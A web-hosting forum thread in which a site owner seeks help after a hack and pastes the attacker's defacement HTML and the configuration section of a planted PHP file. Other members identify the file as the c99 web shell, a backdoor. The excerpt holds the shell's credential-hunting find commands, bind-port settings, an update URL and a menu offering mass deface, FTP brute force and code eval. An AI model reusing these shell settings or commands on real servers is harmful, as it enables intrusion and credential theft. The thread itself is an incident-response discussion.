Welcome to the JaguarPC Community
JaguarPC
Sales: (888) 338-5261
Support: (888)-551-3050
Page 1 of 2 12 LastLast
Results 1 to 15 of 22

This is a discussion on My Site been hacked in the Shared & Semi-Dedicated forum
Hi guys, Some asshole had hacked my website here is the scriptes in inserted inside my site. <head> <style> <!-- .style9 { COLOR: #ffffff } ...

  1. #1
    ijo
    ijo is offline
    JPC Member ijo's Avatar
    Join Date
    Sep 2008
    Location
    Buffalo NY
    Posts
    14

    Angry My Site been hacked

    Hi guys,
    Some asshole had hacked my website here is the scriptes in inserted inside my site.
    <head>
    <style>
    <!--
    .style9 {
    COLOR: #ffffff
    }
    .style22 {
    COLOR: #ff0000
    }
    -->
    </style>
    <title> تم الدعس من قبل الهاكر saoucha </title>
    </head>

    <body bgcolor="#000000" background="">

    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <SPAN
    style="FILTER: blur(add=1,direction=270,strength=30); ">
    <P class=style1 align="center">&nbsp;</P>
    </SPAN>
    <p>&nbsp;</p>
    <p align="center">
    <img border="0" src="http://www.sudanesespace.com/files/imgbas_hacker2007.gif" width="350" height="350"></p>
    <p align="center">&nbsp;</p>
    <SPAN
    style="FILTER: blur(add=1,direction=270,strength=30); ">
    <P align=center><SPAN lang=ar-sa>
    <FONT face="Monotype Corsiva" color=#FFFFFF
    size=7>((</FONT><FONT face="Monotype Corsiva" color=#FF0000
    size=7>&nbsp;</FONT><FONT face="Monotype Corsiva" color=#ffffff
    size=7> </FONT></SPAN><FONT face="Monotype Corsiva" color=#008000 size=7>H</FONT><FONT face="Monotype Corsiva" color=#ffffff size=7>a</FONT><FONT face="Monotype Corsiva" color=#008000 size=7>c</FONT><FONT face="Monotype Corsiva" color=#ffffff size=7>k</FONT><FONT face="Monotype Corsiva" color=#008000 size=7>e</FONT><FONT face="Monotype Corsiva" color=#ffffff size=7>d
    </FONT><FONT face="Monotype Corsiva" color=#008000 size=7>b</FONT><FONT face="Monotype Corsiva" color=#FFFFFF size=7>y</FONT><SPAN lang=ar-sa><FONT
    face="Monotype Corsiva" color=#ffffff size=7> </FONT>
    <FONT
    face="Monotype Corsiva" color=#FFFFFF size=7> ))</FONT></SPAN></P>
    <P align=center>&nbsp;</P>
    <SPAN style="FILTER: blur(add=1,direction=270,strength=30)">< B><SPAN lang=ar-sa
    style="FONT-FAMILY: Comic Sans MS">
    <P align=center><FONT size=7 color="#FFFFFF">الهاكر saoucha
    </FONT></P></SPAN></B></SPAN>
    <P align=center>&nbsp;</P>
    <P align=center><font size="7">
    <SPAN
    style="COLOR: red; FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN><font color="#FFFFFF"><SPAN
    style="FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN></font><SPAN
    style="COLOR: red; FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN><font color="#FFFFFF"><SPAN
    style="FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN></font><SPAN
    style="COLOR: red; FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN><font color="#FFFFFF"><SPAN
    style="FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN></font></font></P>
    <P align=center><font face="Monotype Corsiva" size="7" color="#008000">

    <P align=center><font size="7">
    <SPAN
    style="COLOR: red; FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN><font color="#FFFFFF"><SPAN
    style="FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN></font><SPAN
    style="COLOR: red; FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN><font color="#FFFFFF"><SPAN
    style="FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN></font><SPAN
    style="COLOR: red; FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN><font color="#FFFFFF"><SPAN
    style="FONT-FAMILY: Wingdings; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'">N</SPAN></font></font></P>
    <P align=center>&nbsp;</P></SPAN>
    <p align="center">
    <span lang="ar-sa" style="filter: blur(add=1,direction=270,strength=30)">
    <font face="Andalus" size="7" color="#FFFFFF">اترك </font>
    <font face="Andalus" size="7" color="#008000">لنا</font><font face="Andalus" size="7" color="#FFFFFF">
    الفعل </font>
    <font face="Andalus" size="7" color="#008000">وسنترك</font><font face="Andalus" size="7" color="#FFFFFF">
    لك </font>
    <font face="Andalus" size="7" color="#008000">الكلام</font></span></p>
    <p align="center">
    <img border="0" src="" width="576" height="29"></p>
    <p align="center">
    <span style="FILTER: blur(add=1,direction=270,strength=30); HEIGHT: 30px">
    <span lang="ar-sa" style="filter: blur(add=1,direction=270,strength=30)">
    <font face="Al-Hadith1" color="#ffffff" size="6">الحماية </font>
    <font face="Al-Hadith1" size="6" color="#008000">صنعت </font>
    <font face="Al-Hadith1" color="#ffffff" size="6">من </font>
    <font face="Al-Hadith1" size="6" color="#008000">اجل </font>
    <font face="Al-Hadith1" color="#ffffff" size="6">الاختراق </font>
    <font face="Al-Hadith1" size="6" color="#008000">فلا </font>
    <font face="Al-Hadith1" color="#ffffff" size="6">يأس </font>
    <font face="Al-Hadith1" size="6" color="#008000">مع الحياة</font></span><span lang="ar-sa"><b><font face="DecoType Naskh Extensions" color="#ffffff" size="6">&nbsp;</font></b></span></span></p>


    <script language="JavaScript1.2">
    if (document.all)
    document.body.style.cssText="border:25 ridge green"
    </script>

    <SPAN
    style="FILTER: blur(add=1,direction=270,strength=30); "><B>
    <SPAN lang=ar-sa style="font-family: Comic Sans MS">
    <P align=center><font color="#FFFFFF">&nbsp;</font><font color="#FFFFFF" size="7">;</font></SPAN><font color="#FFFFFF">
    </font>
    <P style="TEXT-ALIGN: center; mso-line-height-alt: .75pt"
    align=center><font color="#FFFFFF"><O:P><FONT face="Eras Medium ITC"
    size=6><STRONG></STRONG></FONT></O:P><O:P><FONT face="Eras Medium ITC"
    size=6><STRONG><SPAN
    </SPAN></STRONG></FONT></O:P></font></P><SPAN
    lang=ar-sa style="FONT-FAMILY: Comic Sans MS"><font color="#FFFFFF"></TD>
    </font>
    <P align=center><FONT size=7 color="#FFFFFF"></FONT></P>
    </SPAN></B></SPAN>
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <SPAN
    style="FILTER: blur(add=1,direction=270,strength=30); "><B><SPAN
    style="FONT-WEIGHT: 700">
    <SPAN lang=ar-sa id=theText
    style="FILTER: Glow(Color=lime, Strength=10); ">
    <P align=center><font color="#FFFFFF" size="5"><SPAN lang=ar-sa
    style="FILTER: blur(add=1,direction=270,strength=30); FONT-FAMILY: Comic Sans MS">
    <img border="0" src="http://www.sudanesespace.com/files/hacked28hiax0.png" width="350" height="350"></p>
    <p align="center">&nbsp;</p>
    </SPAN></SPAN></B></SPAN>

    </SPAN></font><SPAN dir=ltr
    style="FONT-SIZE: 72pt; COLOR: white; FONT-FAMILY: Chiller; mso-themecolor: background1"> AdMiN</SPAN></p>
    <p align="center">
    <span lang="ar-sa"><font face="Simple Outline Pat" color="#008000" size="7">جرت
    قلم وامحيك</font></span></p>
    <p align="center">
    <span style="font-family: Chiller; font-size: 72pt" lang="en-us" dir="ltr">
    <font color="#FFFFFF"><a href="mailto:"><font color="#FFFFFF">
    hakokaka@hotmail.com</font></a></font></span></p>
    <p align="center">
    <font color="#008000"><span style="font-family: Chiller; font-size: 72pt"></span></font></p>
    <p align="center">
    <span dir="ltr"><a href=""><font color="#FFFFFF">
    <span style="font-family: Chiller; font-size: 72pt"></span></font></a></span></p>
    <p align="center">
    <font face="Chiller" style="font-size: 72pt" color="#008000"></font></p>
    <p align="center">
    <font face="Chiller" size="7" color="#FFFFFF"></font></p>
    <p align="center">
    <font size="7" color="#008000"><span style="font-family: PT Bold Dusky"></span></font></p>
    <p align="center">
    <font face="Chiller" size="7" color="#FFFFFF">
    <a href="mailto:"><font color="#FFFFFF">
    </font></a></font></p>
    <p align="center">&nbsp;
    </p>
    <p align="center">
    <span lang="ar-sa"><font size="7" color="#008000">
    <span style="font-family: PT Bold Dusky">mail</span></font></span></p>
    <p align="center">
    <a href="mailto:HaKoKaKa@HOTMAIL.COM">
    <font face="Chiller" size="7" color="#FFFFFF"></font></a><font face="Chiller" size="7" color="#FFFFFF"><a href="mailto:"><font color="#FFFFFF"></font></a></font></p>
    <p align="center">&nbsp;
    </p>
    <p align="center">
    <font face="Chiller">
    <SPAN
    style="FILTER: blur(add=1,direction=270,strength=30); ">
    <font size="7" color="#008000">HaCkeR aLGeRiaN
    m&nbsp;&nbsp;&nbsp;&nbsp; <br>
    &nbsp;</font></SPAN></font></p>
    <p align="center">
    <span dir="ltr"><a href="http://www.startimess2.my3gb.com/f/">
    <font color="#FFFFFF" size="7">
    <span style="font-family: Chiller; ">http://www.startimess2.my3gb.com/f/<br>
    &nbsp;</span></font></a></span></p>
    <p align="center">&nbsp;
    </p>
    <p align="center">&nbsp;
    </p>
    <p align="center">&nbsp;
    </p>
    <p align="center">&nbsp;
    </p>
    <p align="center">&nbsp;</p>





    <STYLE>
    BODY {
    scrollbar-3dlight-color: #008000;
    scrollbar-arrow-color: #008000;
    scrollbar-darkshadow-color: #008000;
    scrollbar-face-color: #000000;
    scrollbar-highlight-color: #008000;
    scrollbar-shadow-color: #008000;
    scrollbar-track-color: #000033}
    </STYLE>

    <p align="center">

    <EMBED name=video
    pluginspage=http://www.real.com/player/ src=http://6aye.com/jihaad.ram
    width=165 height=62 type=audio/x-pn-realaudio-plugin loop="true"
    autostart="true" nojava="true" controls="ControlPanel,StatusBar"
    maintainaspect="false" true hidden></p>


    <BODY onLoad="alert(' StOoOp HaCkEd By: الهاكر saoucha
    ');" onUnload="alert('SeE YoU');">


    <script>

    //Pop-under window II- By JaBrOt HaCkEr
    //Credit notice must stay intact for use
    //Visit http://javascriptkit.com for this script
    // Visit h/ for more code
    // Translated By /

    //
    var popunder=new Array()
    popunder[0]=""
    //specify popunder window features //
    //set 1 to enable a particular feature, 0 to disable
    var winfeatures="width=600,height=300,scroll bars=0,resizable=0,toolbar=0,location=0, menubar=0,status=0,directories=0"

    //Pop-under only once per browser session? (0=no, 1=yes)
    //Specifying 0 will cause popunder to load every time page is loaded
    var once_per_session=0

    /// ا/////

    function get_cookie(Name) {
    var search = Name + "="
    var returnvalue = "";
    if (document.cookie.length > 0) {
    offset = document.cookie.indexOf(search)
    if (offset != -1) { // if cookie exists
    offset += search.length
    // set index of beginning of value
    end = document.cookie.indexOf(";", offset);
    // set index of end of cookie value
    if (end == -1)
    end = document.cookie.length;
    returnvalue=unescape(document.cookie.sub string(offset, end))
    }
    }
    return returnvalue;
    }

    function loadornot(){
    if (get_cookie('popunder')==''){
    loadpopunder()
    document.cookie="popunder=yes"
    }
    }

    function loadpopunder(){
    win2=window.open(popunder[Math.floor(Math.random()*(popunder.lengt h))],"",winfeatures)
    win2.blur()
    window.focus()
    }

    if (once_per_session==0)
    loadpopunder()
    else
    loadornot()

    </script>
    <script type="text/javascript">
    var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
    document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
    </script>
    <script type="text/javascript">
    var pageTracker = _gat._getTracker("UA-231925-2");
    pageTracker._initData();
    pageTracker._trackPageview();

    </script>

    <!-- Begin - Site: Jeeran.com Zone: Members - Eye Blaster -->
    <script language="javascript" type="text/javascript">
    <!--
    var SiteID = 1;
    var ZoneID = 217;
    var browDateTime = (new Date()).getTime();

    document.write('<s'+'cript lang' + 'uage="jav' + 'ascript" src="http://serve.jeeranservices.net/a.aspx?ZoneID=' + ZoneID + '&amp;Task=Get&amp;IFR=False&amp;PageID= 63402&amp;SiteID=' + SiteID + '&amp;Random=' + browDateTime + '">'); document.write('</'+'scr'+'ipt>');

    // -->
    </script>

    <!-- End - Site: Jeeran.com Zone: Members - Eye Blaster -->

    <script type="text/javascript" src="http://static.jeeranservices.net/j/memberpages/footer.js">
    </script>

  2. #2
    Loyal Client Pawel Kowalski's Avatar
    Join Date
    Sep 2001
    Location
    Albuquerque NM
    Posts
    1,405
    What php (or other) scripts were you using?

  3. #3
    ijo
    ijo is offline
    JPC Member ijo's Avatar
    Join Date
    Sep 2008
    Location
    Buffalo NY
    Posts
    14
    Hi Pawel,
    Thanks for quick reply.My site been down for couple of days now, the hacker is using my site to collect Bank of America credit card information from clients.
    My site is a social network. To make the problem worse am not really familiar with the scripts. The version of script am using is Social Media v2.0.0(by Nathan Harber of www.entertainmentscripts.com). Am using Php4,
    Mind telling me more about ( miscinfo.php) am kind of suspicious of some codes:
    <?php
    $shver = "1.0 beta (4.02.2005)"; //Current version
    //CONFIGURATION
    $surl = "?"; //link to this script, INCLUDE "?".
    $rootdir = "./"; //e.g "c:", "/","/home"
    $timelimit = 60; //limit of execution this script (seconds).

    //Authentication

    $login = false; //login
    //DON'T FOGOT ABOUT CHANGE PASSWORD!!!
    $pass = "team"; //password
    $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
    //$login = false; //turn off authentication

    $autoupdate = true; //Automatic updating?

    $updatenow = false; //If true, update now

    $c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server

    $autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod

    $filestealth = 1; //if true, don't change modify&access-time

    $donated_html = ""; //If you publish free shell and you wish
    //add link to your site or any other information,
    //put here your html.
    $donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.

    $host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")

    $curdir = "./"; //start directory

    $tmpdir = dirname(__FILE__); //Directory for tempory files

    // Registered file-types.
    // array(
    // "{action1}"=>array("ext1","ext2","ext3", ...),
    // "{action2}"=>array("ext1","ext2","ext3", ...),
    // ...
    // )
    $ftypes = array(
    "html"=>array("html","htm","shtml"),
    "txt"=>array("txt","conf","bat","sh","js ","bak","doc","log","sfc","cfg"),
    "exe"=>array("sh","install","bat","cmd") ,
    "ini"=>array("ini","inf"),
    "code"=>array("php","phtml","php3","php4 ","inc","tcl","h","c","cpp"),
    "img"=>array("gif","png","jpeg","jpg","j pe","bmp","ico","tif","tiff","avi","mpg" ,"mpeg"),
    "sdb"=>array("sdb"),
    "phpsess"=>array("sess"),
    "download"=>array("exe","com","pif","src ","lnk","zip","rar")
    );

    $hexdump_lines = 8; // lines in hex preview file
    $hexdump_rows = 24; // 16, 24 or 32 bytes in one line

    $nixpwdperpage = 100; // Get first N lines from /etc/passwd

    $bindport_pass = "c99"; // default password for binding
    $bindport_port = "11457"; // default port for binding

    /* Command-aliases system */
    $aliases = array();
    $aliases[] = array("-----------------------------------------------------------", "ls -la");
    /* поиск на сервере всех файлов с suid битом */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
    /* поиск в текущей директории всех файлов с suid битом */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
    /* поиск на сервере всех файлов с sgid битом */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
    /* поиск в текущей директории всех файлов с sgid битом */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
    /* поиск на сервере файлов config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
    /* поиск на сервере файлов config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
    /* поиск в текущей директории файлов config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
    /* поиск на сервере всех директорий и файлов доступных на запись для всех */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
    /* поиск в текущей директории всех директорий и файлов доступных на запись для всех */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
    /* поиск на сервере файлов service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
    /* поиск в текущей директории файлов service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
    /* поиск на сервере файлов .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
    /* поиск в текущей директории файлов .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
    /* поиск всех файлов .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
    /* поиск в текущей директории файлов .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
    /* поиск всех файлов .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
    /* поиск в текущей директории файлов .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
    /* вывод списка атрибутов файлов на файловой системе ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
    /* просмотр открытых портов */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");

    $sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
    $sess_cookie = "c99shvars"; // cookie-variable name

    if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand( 1,999).rand(1,999));}
    $sess_file = $tmpdir."c99shvars_".$sid.".tmp";

    $usefsbuff = true; //Buffer-function
    $copy_unset = false; //Delete copied files from buffer after pasting

    //Quick launch
    $quicklaunch = array();
    $quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
    $quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
    $quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
    $quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
    $quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
    $quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
    $quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
    $quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d");
    $quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d");
    $quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d");
    $quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d");
    $quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d");
    $quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d");
    $quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d");
    $quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target");
    $quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove");
    $quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()");

  4. #4
    ijo
    ijo is offline
    JPC Member ijo's Avatar
    Join Date
    Sep 2008
    Location
    Buffalo NY
    Posts
    14
    Hi Pawel,
    I just copy paste some of the codes
    Thanks in advance
    Ijo

  5. #5
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Quote Originally Posted by ijo View Post
    My site been down for couple of days now, the hacker is using my site to collect Bank of America credit card information from clients.
    Looks like it's been going on for a while...

    http://groups.google.com/group/news....5104641cdc75be

    Have you contacted Tech Support?
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  6. #6
    ijo
    ijo is offline
    JPC Member ijo's Avatar
    Join Date
    Sep 2008
    Location
    Buffalo NY
    Posts
    14
    Hi Vin DSL,
    Sup? I contacted tech-support am told them to disable the site till the problem is solved.

  7. #7
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    ~Cool

    The only way I know of finding out how the perps got into your site is by investigating your 'logs' line-by-line.
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  8. #8
    Not A Senior Member homoludens's Avatar
    Join Date
    Sep 2005
    Location
    H-Town
    Posts
    582
    Mind telling me more about ( miscinfo.php) am kind of suspicious of some codes:
    It looks like it's the c99sh shell, which is used to backdoor websites.

    Is that file part of the code you originally downloaded? That might sound like a stupid question, so I offer this forum post as a cross reference.

  9. #9
    ijo
    ijo is offline
    JPC Member ijo's Avatar
    Join Date
    Sep 2008
    Location
    Buffalo NY
    Posts
    14
    It's c99shell but do i have to delete it ?
    Any body familiar miscinfo.php?

  10. #10
    Not A Senior Member homoludens's Avatar
    Join Date
    Sep 2005
    Location
    H-Town
    Posts
    582
    It's c99shell but do i have to delete it ?
    Yes. This very minute.

    Was it part of the original code for Social Media?

  11. #11
    ijo
    ijo is offline
    JPC Member ijo's Avatar
    Join Date
    Sep 2008
    Location
    Buffalo NY
    Posts
    14
    I think so

  12. #12
    ijo
    ijo is offline
    JPC Member ijo's Avatar
    Join Date
    Sep 2008
    Location
    Buffalo NY
    Posts
    14
    But it seem like the hacker insert some codes in it

  13. #13
    ijo
    ijo is offline
    JPC Member ijo's Avatar
    Join Date
    Sep 2008
    Location
    Buffalo NY
    Posts
    14
    hey homoluden!

  14. #14
    ijo
    ijo is offline
    JPC Member ijo's Avatar
    Join Date
    Sep 2008
    Location
    Buffalo NY
    Posts
    14
    am gonna copy paste the code here mind if you go through it

  15. #15
    Not A Senior Member homoludens's Avatar
    Join Date
    Sep 2005
    Location
    H-Town
    Posts
    582
    What do you want me to look at? c99shell or the original?

Page 1 of 2 12 LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •